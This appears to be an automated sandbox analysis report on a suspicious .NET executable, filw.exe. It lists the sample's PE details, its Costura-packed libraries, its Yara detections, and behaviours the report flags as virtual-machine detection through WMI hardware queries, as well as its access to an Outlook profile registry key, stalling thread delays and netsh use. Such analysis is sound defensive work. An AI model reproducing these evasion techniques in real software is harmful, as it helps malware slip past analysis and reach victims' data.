File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\filw.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: filw.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: filw.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: filw.exe

Static file information: File size 6371328 > 1048576

Source: filw.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x612200

Source: filw.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: filw.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: polly9costura.polly.dll.compressed9costura.polly.pdb.compressed3sqlitepclraw.batteries_v2acostura.sqlitepclraw.batteries_v2.dll.compressed#sqlitepclraw.coreQcostura.sqlitepclraw.core.dll.compressedGsqlitepclraw.provider.dynamic_cdeclucostura.sqlitepclraw.provider.dynamic_cdecl.dll.compressed source: filw.exe
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdb source: filw.exe, 00000000.00000002.1999733605.0000019D22A2D000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2005243574.0000019D2B860000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1999733605.0000019D229DD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: filw.exe, 00000000.00000002.2003618026.0000019D2B320000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: filw.exe
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed\|\|\|Newtonsoft.Json.Bson.pdb\|8D66819B2D5D4D2CFADB7660B1869A81C5DB7E9F\|26968 source: filw.exe
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: filw.exe, 00000000.00000002.2003165019.0000019D2B130000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/netstandard2.0/ICSharpCode.SharpZipLib.pdbSHA2567 source: filw.exe, 00000000.00000002.1999733605.0000019D22A2D000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2005243574.0000019D2B860000.00000004.08000000.00040000.00000000.sdmp, filw.exe, 00000000.00000002.1999733605.0000019D229DD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr
Source:	Binary string: costura.costura.pdb.compressed source: filw.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed source: filw.exe
Source:	Binary string: !costura.polly.core.pdb.compressed source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed source: filw.exe
Source:	Binary string: wpf.ui;costura.wpf.ui.dll.compressed;costura.wpf.ui.pdb.compressed source: filw.exe
Source:	Binary string: olnl.pdb source: filw.exe, 00000000.00000002.2001203296.0000019D2AC7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdbBSJB source: filw.exe, 00000000.00000002.2004906378.0000019D2B810000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.CompilerServices.Unsafe\net461-Release\System.Runtime.CompilerServices.Unsafe.pdb source: filw.exe, 00000000.00000002.2004906378.0000019D2B810000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdbSHA256 source: filw.exe, 00000000.00000002.2003583949.0000019D2B310000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdbSHA256* source: filw.exe, 00000000.00000002.2005115328.0000019D2B820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: polly.coreCcostura.polly.core.dll.compressedCcostura.polly.core.pdb.compressed source: filw.exe
Source:	Binary string: +costura.newtonsoft.json.bson.pdb.compressed source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: costura.newtonsoft.json.bson.pdb.compressed source: filw.exe
Source:	Binary string: costura.wpf.ui.pdb.compressed\|\|\|Wpf.Ui.pdb\|299223DFCADFE8FD464F218CE110C10266AB22B0\|139288 source: filw.exe
Source:	Binary string: .costura.icsharpcode.sharpziplib.pdb.compressed source: filw.exe, 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdb source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Encodings.Web/Release/net462/System.Text.Encodings.Web.pdb source: filw.exe, 00000000.00000002.2005115328.0000019D2B820000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.polly.pdb.compressed source: filw.exe
Source:	Binary string: e_sqlite3Acostura.e_sqlite3.dll.compressed/icsharpcode.sharpziplib]costura.icsharpcode.sharpziplib.dll.compressed]costura.icsharpcode.sharpziplib.pdb.compressed;microsoft.bcl.asyncinterfacesicostura.microsoft.bcl.asyncinterfaces.dll.compressed5microsoft.bcl.timeproviderccostura.microsoft.bcl.timeprovider.dll.compressed+microsoft.data.sqliteYcostura.microsoft.data.sqlite.dll.compressed)newtonsoft.json.bsonWcostura.newtonsoft.json.bson.dll.compressedWcostura.newtonsoft.json.bson.pdb.compressed source: filw.exe
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Buffers\netfx\System.Buffers.pdb source: filw.exe, 00000000.00000002.2004857913.0000019D2B800000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: /_/artifacts/obj/System.Text.Json/Release/net462/System.Text.Json.pdbSHA256 source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2004445944.0000019D2B760000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Threading.Tasks.Extensions\netfx\System.Threading.Tasks.Extensions.pdb source: filw.exe, 00000000.00000002.1993398707.0000019D12AFA000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.1993398707.0000019D12B41000.00000004.00000800.00020000.00000000.sdmp, filw.exe, 00000000.00000002.2003547527.0000019D2B300000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.costura.pdb.compressed\|\|\|Costura.pdb\|6C6000A5EAF8579850AB82A89BD6268776EB51AD\|2608 source: filw.exe
Source:	Binary string: costura.polly.pdb.compressed\|\|\|Polly.pdb\|6E4429D15FBCD96C44E391E109CB500EC2508333\|83400 source: filw.exe
Source:	Binary string: costura.polly.core.pdb.compressed\|\|\|Polly.Core.pdb\|C1D3F2BA348EA2F6635B8F5961AD127E831487C6\|66148 source: filw.exe
Source:	Binary string: costura.icsharpcode.sharpziplib.pdb.compressed\|\|\|ICSharpCode.SharpZipLib.pdb\|E1FCA83029D1440F54FB3747B240365A6DF0A598\|121652 source: filw.exe
Source:	Binary string: /_/artifacts/obj/Microsoft.Bcl.AsyncInterfaces/Release/net462/Microsoft.Bcl.AsyncInterfaces.pdb source: filw.exe, 00000000.00000002.2003583949.0000019D2B310000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: costura.polly.core.pdb.compressed source: filw.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: filw.exe, AssemblyLoader.cs

.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])

Yara detected Costura Assembly Loader

Source: Yara match	File source: filw.exe, type: SAMPLE
Source: Yara match	File source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR

Source: filw.exe

Static PE information: 0x968EA180 [Sun Jan 16 07:10:56 2050 UTC]

Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9BADC0F4 push eax; ret		0_2_00007FFD9BADC299
Source: C:\Users\user\Desktop\filw.exe	Code function: 0_2_00007FFD9BAE1599 pushad ; retf		0_2_00007FFD9BAE15C9

Source: C:\Users\user\Desktop\filw.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM5

Source: Yara match	File source: filw.exe, type: SAMPLE
Source: Yara match	File source: 0.0.filw.exe.19d101d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1993398707.0000019D12421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1675375427.0000019D101D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: filw.exe PID: 7432, type: MEMORYSTR

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\filw.exe	Memory allocated: 19D10B10000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Memory allocated: 19D2A420000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 599102	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598981	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598864	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598607	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591927	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591802	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591677	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591552	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591425	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591300	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591175	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 591050	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 590926	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Thread delayed: delay time: 590798	Jump to behavior

Source: C:\Users\user\Desktop\filw.exe	Window / User API: threadDelayed 4213			Jump to behavior
Source: C:\Users\user\Desktop\filw.exe	Window / User API: threadDelayed 5383			Jump to behavior

Source: C:\Users\user\Desktop\filw.exe TID: 7492	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -22136092888451448s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99857s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99732s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99620s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99326s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99214s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -599102s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -598981s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -598864s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -598607s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -96799s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -96674s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -96549s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -96424s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -96306s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99303s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99176s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -99038s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -98933s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -98794s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -98462s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -98144s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -98018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -97896s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -97771s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -97646s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -97506s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591927s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591802s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591677s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591552s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591425s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591300s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591175s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -591050s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -590926s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\filw.exe TID: 7512	Thread sleep time: -590798s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\filw.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
